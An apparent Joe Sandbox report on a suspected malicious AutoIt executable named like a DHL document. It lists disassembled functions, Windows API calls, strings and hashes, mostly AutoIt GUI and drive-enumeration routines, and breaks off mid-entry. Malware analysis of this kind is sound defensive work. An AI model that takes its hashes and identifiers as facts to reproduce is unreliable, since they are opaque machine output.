Instruction Fuzzy Hash: 1D91837220D0E34ADB2D437A85740BFFFE15A923A131A079FD5F2CA2E1FE189594D624

Function 00417A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708adbb178def6a08fb8acde08d0c93beda3b0232d291d05bf057c0d135bd854
Instruction ID: 02b8e5ec8e78c6a6b509e210014179d19901169035aee529bca9ca2f40c088ba
Opcode Fuzzy Hash: 708adbb178def6a08fb8acde08d0c93beda3b0232d291d05bf057c0d135bd854
Instruction Fuzzy Hash: 5561477124C70956DA349A288895BFF33B4DF41788F24091FE846DB382DB1DAEC2835E

Function 00411706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: d866142b44ea800cf024f36c4dd321057e20df2be1f222eaf9e28af6c828f780
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 818185726090A309DB6D433A85744BFFFE15A923A131A079FD5F2CA3E1EE288594D624

Function 00472ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00472B30
DeleteObject.GDI32(00000000), ref: 00472B43
DestroyWindow.USER32 ref: 00472B52
GetDesktopWindow.USER32 ref: 00472B6D
GetWindowRect.USER32(00000000), ref: 00472B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00472CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00472CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472CF8
GetClientRect.USER32(00000000,?), ref: 00472D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00472D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472D80
GlobalLock.KERNEL32(00000000), ref: 00472D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472D98
GlobalUnlock.KERNEL32(00000000), ref: 00472DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472DA8
GlobalFree.KERNEL32(00000000), ref: 00472DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0048FC38,00000000), ref: 00472DDB
GlobalFree.KERNEL32(00000000), ref: 00472DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00472E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00472E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00472E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0047303F

Strings

static, xrefs: 00472D3A, 00472E91
DISPLAY, xrefs: 00472EA2
AutoIt v3, xrefs: 00472CF2
, xrefs: 00472FC5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 866e2dd8e753ee3c633b67e23ea39956605f66ccddabe7c6e1700586462cd6ba
Instruction ID: 6f81a7561ef25761cb647595b8a919e013b4f7785f940648496f3455bb50c0f3
Opcode Fuzzy Hash: 866e2dd8e753ee3c633b67e23ea39956605f66ccddabe7c6e1700586462cd6ba
Instruction Fuzzy Hash: F1028C71900209AFDB14DF64CD89EAE7BB9EF49310F008569F919AB2A1D778ED01CF64

Function 004870D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048712F
GetSysColorBrush.USER32(0000000F), ref: 00487160
GetSysColor.USER32(0000000F), ref: 0048716C
SetBkColor.GDI32(?,000000FF), ref: 00487186
SelectObject.GDI32(?,?), ref: 00487195
InflateRect.USER32(?,000000FF,000000FF), ref: 004871C0
GetSysColor.USER32(00000010), ref: 004871C8
CreateSolidBrush.GDI32(00000000), ref: 004871CF
FrameRect.USER32(?,?,00000000), ref: 004871DE
DeleteObject.GDI32(00000000), ref: 004871E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00487230
FillRect.USER32(?,?,?), ref: 00487262
GetWindowLongW.USER32(?,000000F0), ref: 00487284

Part of subcall function 004873E8: GetSysColor.USER32(00000012), ref: 00487421
Part of subcall function 004873E8: SetTextColor.GDI32(?,?), ref: 00487425
Part of subcall function 004873E8: GetSysColorBrush.USER32(0000000F), ref: 0048743B
Part of subcall function 004873E8: GetSysColor.USER32(0000000F), ref: 00487446
Part of subcall function 004873E8: GetSysColor.USER32(00000011), ref: 00487463
Part of subcall function 004873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00487471
Part of subcall function 004873E8: SelectObject.GDI32(?,00000000), ref: 00487482
Part of subcall function 004873E8: SetBkColor.GDI32(?,00000000), ref: 0048748B
Part of subcall function 004873E8: SelectObject.GDI32(?,?), ref: 00487498
Part of subcall function 004873E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004874B7
Part of subcall function 004873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004874CE
Part of subcall function 004873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004874DB

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: c24aec3824b235f675668e6487843a3909ef93fc825c1de82468a0cecfb277ee
Instruction ID: 4db8d1974e26953b0362920e91dc8d463998d63b1df0dab4d4ce1c83034535af
Opcode Fuzzy Hash: c24aec3824b235f675668e6487843a3909ef93fc825c1de82468a0cecfb277ee
Instruction Fuzzy Hash: 61A19372008311BFDB10AF64DC88A5F7BA9FB49320F100E2DF962961E1D775D945CB66

Function 00408D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00408E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00446AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00446AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00446F43

Part of subcall function 00408F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00408BE8,?,00000000,?,?,?,?,00408BBA,00000000,?), ref: 00408FC5

SendMessageW.USER32(?,00001053), ref: 00446F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00446F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00446FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00446FB7

Strings

0, xrefs: 00446DCF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 390395688ea9dca7435779d1a48391cf1ddcc099dfbaa62671fa515b61e77b1c
Instruction ID: fd27a577bb4a4d51c1acbde15a64e905f93f23f14c9b58531e696a8f0bc4ff60
Opcode Fuzzy Hash: 390395688ea9dca7435779d1a48391cf1ddcc099dfbaa62671fa515b61e77b1c
Instruction Fuzzy Hash: 2C12A070600211DFEB15CF14C984BAAB7E5FB46300F15447EE585DB262CB39EC52DB9A

Function 00472711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0047273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004728A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004728B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00472900
GetClientRect.USER32(00000000,?), ref: 0047290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00472955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00472964
GetStockObject.GDI32(00000011), ref: 00472974
SelectObject.GDI32(00000000,00000000), ref: 00472978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00472988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00472991
DeleteDC.GDI32(00000000), ref: 0047299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004729C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 004729DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00472A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00472A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00472A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00472A77
GetStockObject.GDI32(00000011), ref: 00472A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00472A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00472A97

Strings

static, xrefs: 0047294F, 00472A71
msctls_progress32, xrefs: 00472A13
DISPLAY, xrefs: 0047295A
AutoIt v3, xrefs: 004728F8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c237629a10aa0cac6875291068ee474f356d9d916eaa31520df21e861db4c87f
Instruction ID: 3c78963f6ef73bf949395c8a4c94b4923fe62d3c00a52e7ff2c28969f7795044
Opcode Fuzzy Hash: c237629a10aa0cac6875291068ee474f356d9d916eaa31520df21e861db4c87f
Instruction Fuzzy Hash: FBB17171A00219AFEB14DF68CD85FAE7BB9EB05714F008519FA15EB2A1D774ED00CBA4

Function 00464ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00464AED
GetDriveTypeW.KERNEL32(?,0048CB68,?,\\.\,0048CC08), ref: 00464BCA
SetErrorMode.KERNEL32(00000000,0048CB68,?,\\.\,0048CC08), ref: 00464D36

Strings

iSCSI, xrefs: 00464CC2
RAID, xrefs: 00464CBB
Virtual, xrefs: 00464CE5
PhysicalDrive, xrefs: 00464B76
CDROM, xrefs: 00464BFB
ATA, xrefs: 00464C98
FileBackedVirtual, xrefs: 00464CEC
Removable, xrefs: 00464C10, 00464C15
Fixed, xrefs: 00464C09
Network, xrefs: 00464C02
SATA, xrefs: 00464CD0
\\.\, xrefs: 00464B3F
1394, xrefs: 00464C9F
MMC, xrefs: 00464CDE
RAMDisk, xrefs: 00464BF4
USB, xrefs: 00464CB4
SCSI, xrefs: 00464C8A
ATAPI, xrefs: 00464C91
SAS, xrefs: 00464CC9
Unknown, xrefs: 00464BED, 00464C83
SSA, xrefs: 00464CA6
SSD, xrefs: 00464C4A
Fibre, xrefs: 00464CAD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9e4235645da84edd8de2d6e32ad7608d11eeee35b17a19d568601b15f5ae5fc3
Instruction ID: d49ee9f95d53a8e2f440c812ae9e275aa302d57f6f69503e27375d3ec739bda2
Opcode Fuzzy Hash: 9e4235645da84edd8de2d6e32ad7608d11eeee35b17a19d568601b15f5ae5fc3
Instruction Fuzzy Hash: 8A61B4706011059BCF04DF18C981ABD7BA4AF84744B268417F906AB791EB3DED42DB6F

Function 004873E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00487421
SetTextColor.GDI32(?,?), ref: 00487425
GetSysColorBrush.USER32(0000000F), ref: 0048743B
GetSysColor.USER32(0000000F), ref: 00487446
CreateSolidBrush.GDI32(?), ref: 0048744B
GetSysColor.USER32(00000011), ref: 00487463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00487471
SelectObject.GDI32(?,00000000), ref: 00487482
SetBkColor.GDI32(?,00000000), ref: 0048748B
SelectObject.GDI32(?,?), ref: 00487498
InflateRect.USER32(?,000000FF,000000FF), ref: 004874B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004874CE
GetWindowLongW.USER32(00000000,000000F0), ref: 004874DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00487554
InflateRect.USER32(?,000000FD,000000FD), ref: 00487572
DrawFocusRect.USER32(?,?), ref: 0048757D
GetSysColor.USER32(00000011), ref: 0048758E
SetTextColor.GDI32(?,00000000), ref: 00487596
DrawTextW.USER32(?,004870F5,000000FF,?,00000000), ref: 004875A8
SelectObject.GDI32(?,?), ref: 004875BF
DeleteObject.GDI32(?), ref: 004875CA
SelectObject.GDI32(?,?), ref: 004875D0
DeleteObject.GDI32(?), ref: 004875D5
SetTextColor.GDI32(?,?), ref: 004875DB
SetBkColor.GDI32(?,?), ref: 004875E5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: f116ac966e87eb406f1b9b990bc04dc2de1f9a2f868d1578656cafe082b66341
Instruction ID: 91834c63deecba1c28efbcf2012d82d1cff2ceb27d464145bb39742f0729ccd5
Opcode Fuzzy Hash: f116ac966e87eb406f1b9b990bc04dc2de1f9a2f868d1578656cafe082b66341
Instruction Fuzzy Hash: E4616271900218BFDF019FA4DC89E9E7F79EB08720F214926F915B72A1D7749940DFA4

Function 00480FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00481128
GetDesktopWindow.USER32 ref: 0048113D
GetWindowRect.USER32(00000000), ref: 00481144
GetWindowLongW.USER32(?,000000F0), ref: 00481199
DestroyWindow.USER32(?), ref: 004811B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004811ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00481232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00481245
IsWindowVisible.USER32(00000000), ref: 004812A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004812BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004812D0
GetWindowRect.USER32(00000000,?), ref: 004812E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0048130E
GetMonitorInfoW.USER32(00000000,?), ref: 00481328
CopyRect.USER32(?,?), ref: 0048133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 004813AA

Strings

tooltips_class32, xrefs: 004811E6
(, xrefs: 0048131B
0, xrefs: 004810D3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 12ac5bf56569f90a352054741e58e76d93b533239eaa7f125d54f4d868906ecc
Instruction ID: 242c7cc1ddb4cb030afc4e5475ec2bf45860f46c87befa9398436a209498ba4f
Opcode Fuzzy Hash: 12ac5bf56569f90a352054741e58e76d93b533239eaa7f125d54f4d868906ecc
Instruction Fuzzy Hash: F6B15A71604341AFD700EF64C884B6FBBE8EF89350F00891EF999AB261D775E845CBA5

Function 00480241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004802E5
_wcslen.LIBCMT ref: 0048031F
_wcslen.LIBCMT ref: 00480389
_wcslen.LIBCMT ref: 004803F1
_wcslen.LIBCMT ref: 00480475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004804C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00480504

Part of subcall function 0040F9F2: _wcslen.LIBCMT ref: 0040F9FD

Part of subcall function 0045223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00452258
Part of subcall function 0045223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0045228A

Strings

SELECTINVERT, xrefs: 0048057E
SELECT, xrefs: 00480548
VIEWCHANGE, xrefs: 00480675
GETITEMCOUNT, xrefs: 00480316, 00480337
FINDITEM, xrefs: 00480627
SELECTALL, xrefs: 00480515
ISSELECTED, xrefs: 004804DD
SELECTCLEAR, xrefs: 0048052D
GETTEXT, xrefs: 004803EC, 00480407
GETSELECTED, xrefs: 004805E1
GETSUBITEMCOUNT, xrefs: 00480384, 0048039F
GETSELECTEDCOUNT, xrefs: 00480470, 0048048B
DESELECT, xrefs: 0048059C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 729e51699a61ffa8fa000ab6f9cb14f1e6deca7ad7e52268d0484fcaab03dfb2
Instruction ID: 9ced06c6722300d08bf71e6cd293c10eeb13b2a361724dfe8a2f3abda420b7d8
Opcode Fuzzy Hash: 729e51699a61ffa8fa000ab6f9cb14f1e6deca7ad7e52268d0484fcaab03dfb2
Instruction Fuzzy Hash: 45E1CF312282019BC754EF24C55083FB3E2BFC8718B14496EF896AB3A1D738ED49CB56

Function 00408891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00408968
GetSystemMetrics.USER32(00000007), ref: 00408970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0040899B
GetSystemMetrics.USER32(00000008), ref: 004089A3
GetSystemMetrics.USER32(00000004), ref: 004089C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004089E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004089F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00408A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00408A3C
GetClientRect.USER32(00000000,000000FF), ref: 00408A5A
GetStockObject.GDI32(00000011), ref: 00408A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00408A81

Part of subcall function 0040912D: GetCursorPos.USER32(?), ref: 00409141
Part of subcall function 0040912D: ScreenToClient.USER32(00000000,?), ref: 0040915E
Part of subcall function 0040912D: GetAsyncKeyState.USER32(00000001), ref: 00409183
Part of subcall function 0040912D: GetAsyncKeyState.USER32(00000002), ref: 0040919D

SetTimer.USER32(00000000,00000000,00000028,004090FC), ref: 00408AA8

Strings

AutoIt v3 GUI, xrefs: 00408A20

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 45bc68bfae183393eba131788c9dca4a81a0e3404b6dff0952a9a613207941b7
Instruction ID: 61d346ab6a916e92a2445a6d3c66081714fe4aa408db14056f4900a4e2d0d9e0
Opcode Fuzzy Hash: 45bc68bfae183393eba131788c9dca4a81a0e3404b6dff0952a9a613207941b7
Instruction Fuzzy Hash: CDB16E756002099FDF14EF68CD85BAE3BB5BB49314F11412AFA15A72D0DB38E841CF69

Function 00450D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00451114
Part of subcall function 004510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00450B9B,?,?,?), ref: 00451120
